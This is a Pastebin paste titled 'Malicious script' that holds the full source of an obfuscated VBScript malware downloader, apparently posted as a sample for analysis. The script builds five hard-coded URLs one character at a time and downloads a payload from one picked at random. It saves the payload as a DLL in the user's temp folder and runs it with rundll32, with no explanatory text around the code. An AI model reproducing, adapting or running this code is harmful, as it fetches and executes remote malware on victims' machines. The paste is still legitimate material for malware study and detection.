SHARE
TWEET

Malicious script

dynamoo Oct 28th, 2016 191 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. On Error Resume Next
  2. Const Kq2 = 1, Bl0 = 2, Ni = 8
  3. Const RFl1 = 1, Eb = 2, Wl4 = 2
  4. Const Fy = "437"
  5. Function RSb6(Tv3)
  6. Dim XSf(255), UYz, VEk8
  7. XSf(128)=199
  8. XSf(129)=252
  9. XSf(130)=233
  10. XSf(131)=226
  11. XSf(132)=228
  12. XSf(133)=224
  13. XSf(134)=229
  14. XSf(135)=231
  15. XSf(136)=234
  16. XSf(137)=235
  17. XSf(138)=232
  18. XSf(139)=239
  19. XSf(140)=238
  20. XSf(141)=236
  21. XSf(142)=196
  22. XSf(143)=197
  23. XSf(144)=201
  24. XSf(145)=230
  25. XSf(146)=198
  26. XSf(147)=244
  27. XSf(148)=246
  28. XSf(149)=242
  29. XSf(150)=251
  30. XSf(151)=249
  31. XSf(152)=255
  32. XSf(153)=214
  33. XSf(154)=220
  34. XSf(155)=162
  35. XSf(156)=163
  36. XSf(157)=165
  37. XSf(158)=8359
  38. XSf(159)=402
  39. XSf(160)=225
  40. XSf(161)=237
  41. XSf(162)=243
  42. XSf(163)=250
  43. XSf(164)=241
  44. XSf(165)=209
  45. XSf(166)=170
  46. XSf(167)=186
  47. XSf(168)=191
  48. XSf(169)=8976
  49. XSf(170)=172
  50. XSf(171)=189
  51. XSf(172)=188
  52. XSf(173)=161
  53. XSf(174)=171
  54. XSf(175)=187
  55. XSf(176)=9617
  56. XSf(177)=9618
  57. XSf(178)=9619
  58. XSf(179)=9474
  59. XSf(180)=9508
  60. XSf(181)=9569
  61. XSf(182)=9570
  62. XSf(183)=9558
  63. XSf(184)=9557
  64. XSf(185)=9571
  65. XSf(186)=9553
  66. XSf(187)=9559
  67. XSf(188)=9565
  68. XSf(189)=9564
  69. XSf(190)=9563
  70. XSf(191)=9488
  71. XSf(192)=9492
  72. XSf(193)=9524
  73. XSf(194)=9516
  74. XSf(195)=9500
  75. XSf(196)=9472
  76. XSf(197)=9532
  77. XSf(198)=9566
  78. XSf(199)=9567
  79. XSf(200)=9562
  80. XSf(201)=9556
  81. XSf(202)=9577
  82. XSf(203)=9574
  83. XSf(204)=9568
  84. XSf(205)=9552
  85. XSf(206)=9580
  86. XSf(207)=9575
  87. XSf(208)=9576
  88. XSf(209)=9572
  89. XSf(210)=9573
  90. XSf(211)=9561
  91. XSf(212)=9560
  92. XSf(213)=9554
  93. XSf(214)=9555
  94. XSf(215)=9579
  95. XSf(216)=9578
  96. XSf(217)=9496
  97. XSf(218)=9484
  98. XSf(219)=9608
  99. XSf(220)=9604
  100. XSf(221)=9612
  101. XSf(222)=9616
  102. XSf(223)=9600
  103. XSf(224)=945
  104. XSf(225)=223
  105. XSf(226)=915
  106. XSf(227)=960
  107. XSf(228)=931
  108. XSf(229)=963
  109. XSf(230)=181
  110. XSf(231)=964
  111. XSf(232)=934
  112. XSf(233)=920
  113. XSf(234)=937
  114. XSf(235)=948
  115. XSf(236)=8734
  116. XSf(237)=966
  117. XSf(238)=949
  118. XSf(239)=8745
  119. XSf(240)=8801
  120. XSf(241)=177
  121. XSf(242)=8805
  122. XSf(243)=8804
  123. XSf(244)=8992
  124. XSf(245)=8993
  125. XSf(246)=247
  126. XSf(247)=8776
  127. XSf(248)=176
  128. XSf(249)=8729
  129. XSf(250)=183
  130. XSf(251)=8730
  131. XSf(252)=8319
  132. XSf(253)=178
  133. XSf(254)=9632
  134. XSf(255)=160
  135. s = ""
  136. For VEk8 = 0 To UBound(Tv3)
  137. If Tv3(VEk8) < 0 Or Tv3(VEk8) > 255 Then
  138. Err.Raise 50003, "", "a2s()", "", 0
  139. ElseIf Tv3(VEk8) >= 128 Then
  140. UYz = UYz & ChrW(XSf(Tv3(VEk8)))
  141. Else
  142. UYz = UYz & ChrW(Tv3(VEk8))
  143. End If
  144. Next
  145. RSb6 = UYz
  146. End Function
  147. Function Nu3(OPb)
  148. Dim Xj, PTi, UYz
  149. Set Xj = CreateObject("ADODB.Stream")
  150. Xj.type = Eb
  151. Xj.Charset = Fy
  152. Xj.Open
  153. Xj.LoadFromFile OPb
  154. UYz = Xj.ReadText
  155. Xj.Close
  156. Nu3 = WFo3(UYz)
  157. End Function
  158. Sub So(OPb, Tv3)
  159. Dim Xj, UYz
  160. Set Xj = CreateObject("ADODB.Stream")
  161. Xj.type = Eb
  162. Xj.Charset = Fy
  163. Xj.Open
  164. UYz = RSb6(Tv3)
  165. Xj.WriteText UYz
  166. Xj.SaveToFile OPb, Wl4
  167. Xj.Close
  168. End Sub
  169. Function PKe(Iu7)
  170. Dim UYz, LVb(0)
  171. If Iu7 <= 0 Then
  172. Err.Raise 50001, "", "makearrr()", "", 0
  173. ElseIf Iu7 = 1 Then
  174. PKe = LVb
  175. Else
  176. UYz = Space(Iu7-1)
  177. PKe = Split(UYz, " ")
  178. End If
  179. End Function
  180. Function THv7(url)
  181. Dim HWy, IWu8, PTi, VEk8
  182. Dim Ze, BLm3(1)
  183. Set HWy = CreateObject("Scripting.FileSystemObject")
  184. BLm3(0) = "WinHttp.WinHttpRequest.5.1"
  185. BLm3(1) = "MSXML2.XMLHTTP"
  186. For Each Ze in BLm3
  187. Err.Clear
  188. Set IWu8 = CreateObject(Ze)
  189. If Err.Number = 0 Then
  190. Exit For
  191. End If
  192. Next
  193. IWu8.Open "GET", url, False
  194. IWu8.Send
  195. PTi = PKe(LenB(IWu8.ResponseBody))
  196. For VEk8 = 1 To LenB(IWu8.ResponseBody)
  197. PTi(VEk8-1) = AscB(MidB(IWu8.ResponseBody, VEk8, 1))
  198. Next
  199. THv7 = PTi
  200. End Function
  201. Function Re1()
  202. Dim IRj, Ji, UUr5
  203. Set IRj = CreateObject("WScript.Shell")
  204. Set Ji = IRj.Environment("System")
  205. UUr5 = Ji("PROCESSOR_ARCHITECTURE")
  206. If LCase(UUr5) = "amd64" Then
  207. Re1 = IRj.ExpandEnvironmentStrings("%SystemRoot%\SysWOW64\rundll32.exe")
  208. Else
  209. Re1 = IRj.ExpandEnvironmentStrings("%SystemRoot%\system32\rundll32.exe")
  210. End If
  211. End Function
  212. Sub LBd(Ix, Lw1, Ut)
  213. Dim IRj, HWy, Mm, MOd4, KNf
  214. Set IRj = CreateObject("WScript.Shell")
  215. Set HWy = CreateObject("Scripting.FileSystemObject")
  216. Set Mm = HWy.GetFile(Ix)
  217. MOd4 = Mm.ShortPath
  218. KNf = Re1() + " " + MOd4 + "," + Lw1 + " " + Ut
  219. If 2 > 1 Then
  220. IRj.Run(KNf)
  221. End If
  222. End Sub
  223. Function Ty(Ix)
  224. Dim HWy
  225. Set HWy = CreateObject("Scripting.FileSystemObject")
  226. Ty = HWy.FileExists(Ix)
  227. End Function
  228. Function Ex6(Ix)
  229. Dim HWy, Mm
  230. Set HWy = CreateObject("Scripting.FileSystemObject")
  231. Set Mm = HWy.GetFile(Ix)
  232. Ex6 = Mm.ShortPath
  233. End Function
  234. Function BWg(KQg2, Rd0)
  235. Dim Iu7
  236. Iu7 = CDbl(Int(CDbl(KQg2)/CDbl(Rd0)))
  237. BWg = CDbl(KQg2) - Iu7 * CDbl(Rd0)
  238. End Function
  239. Function Vu(BBa, UYz)
  240. UYz(1) = 172 * UYz(1) Mod 30307
  241. UYz(0) = 171 * UYz(0) Mod 30269
  242. UYz(2) = 170 * UYz(2) Mod 30323
  243. Dim Xf3
  244. Xf3 = BWg((CDbl(UYz(0))/30269.0 + CDbl(UYz(1))/30307.0 + CDbl(UYz(2))/30323.0), 1.0)
  245. Vu = Int(Xf3 * CDbl(BBa))
  246. End Function
  247. Function Kx(PTi, RBu)
  248. Dim PIq5(2), Pj1, Zi, Ya2, VEk8
  249. If UBound(PTi) < 3 Then
  250. Err.Raise 50004, "", "size of array muzt be >= 4", "", 0
  251. End If
  252. Pj1 = PKe(UBound(PTi) - 3)
  253. PIq5(0) = RBu(0)
  254. PIq5(1) = RBu(1)
  255. PIq5(2) = RBu(2)
  256. For VEk8 = 0 To UBound(PTi)
  257. PTi(VEk8) = PTi(VEk8) Xor Vu(256, PIq5)
  258. Next
  259. Zi = PTi(UBound(PTi)-3)+(PTi(UBound(PTi)-2)*256)+(PTi(UBound(PTi)-1)*256*256)+(PTi(UBound(PTi))*256*256*256)
  260. Ya2 = VUf9
  261. For VEk8 = 0 To UBound(Pj1)
  262. Pj1(VEk8) = PTi(VEk8)
  263. Ya2 = (Ya2 + PTi(VEk8)) Mod 1000000000
  264. Next
  265. If Ya2 <> Zi Then
  266. Err.Raise 50005, "", "checksum error", "", 0
  267. End If
  268. Kx = Pj1
  269. End Function
  270. Function GEq(TOv6)
  271. GEq = CInt(TOv6*Rnd())
  272. End Function
  273. Sub Hx(Oi)
  274. WScript.Sleep(Oi)
  275. End Sub
  276. Randomize
  277. Dim WQa2(2), VUf9, VIb(4), OPb
  278. WQa2(0) = 6575
  279. WQa2(1) = 24677
  280. WQa2(2) = 15342
  281. VUf9 = 46
  282. If 1=1 Then
  283. VIb(0) = "http://" & "a" & "n" & "g" & "u" & "n" & "d" & "o" & "v" & "i" & "z" & "." & "c" & "o" & "m" & "/" & "l" & "h" & "k" & "9" & "6" & "w" & "x"
  284. End If
  285. If 1=1 Then
  286. VIb(1) = "http://" & "a" & "1" & "p" & "l" & "u" & "s" & "2" & "." & "d" & "e" & "/" & "l" & "j" & "w" & "x" & "w" & "6" & "v" & "h"
  287. End If
  288. If 1=1 Then
  289. VIb(2) = "http://" & "e" & "n" & "z" & "y" & "m" & "a" & "." & "e" & "s" & "/" & "l" & "p" & "z" & "d" & "1" & "g" & "e" & "v"
  290. End If
  291. If 1=1 Then
  292. VIb(3) = "http://" & "z" & "l" & "o" & "t" & "y" & "s" & "a" & "l" & "m" & "o" & "." & "n" & "e" & "t" & "/" & "0" & "z" & "x" & "0" & "k" & "e" & "n" & "3"
  293. End If
  294. If 1=1 Then
  295. VIb(4) = "http://" & "a" & "o" & "t" & "e" & "a" & "t" & "r" & "i" & "a" & "l" & "." & "n" & "e" & "t" & "/" & "1" & "4" & "2" & "y" & "5" & "x"
  296. End If
  297. OPb = "vJlvsuTTmqgiF"
  298. Dim IRj, Lv, Ov6, Wg
  299. Set objShell = CreateObject("WScript.Shell")
  300. Lv = objShell.ExpandEnvironmentStrings("%" & "TEMP%")
  301. Dim Ag, AKw8, Ab7, Hk, VEk8
  302. AKw8 = False
  303. For VEk8=0 To 10: Do
  304. Ov6 = Lv + "\" + OPb + CStr(VEk8) + ".dll"
  305. If Ty(Ov6) Then
  306. Wg = Ex6(Ov6) & ".txt"
  307. If Ty(Wg) Then
  308. WScript.Quit(0)
  309. End If
  310. End If
  311. If Not AKw8 Then
  312. Ag = GEq(UBound(VIb))
  313. Ab7 = THv7(VIb(Ag))
  314. If Err.Number <> 0 Then
  315. Exit Do
  316. End If
  317. Hk = Ab7  ' Kx(Ab7, WQa2)
  318. If Err.Number <> 0 Then
  319. Exit Do
  320. End If
  321. So Ov6, Hk
  322. If Err.Number <> 0 Then
  323. Exit Do
  324. End If
  325. AKw8 = True
  326. End If
  327. LBd Ov6, "E"&"nhancedStoragePasswordConfig", "147"
  328. Hx 24899
  329. Loop While False: Next
  330. If 3=3 Then
  331. WScript.Quit(1)
  332. End If
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top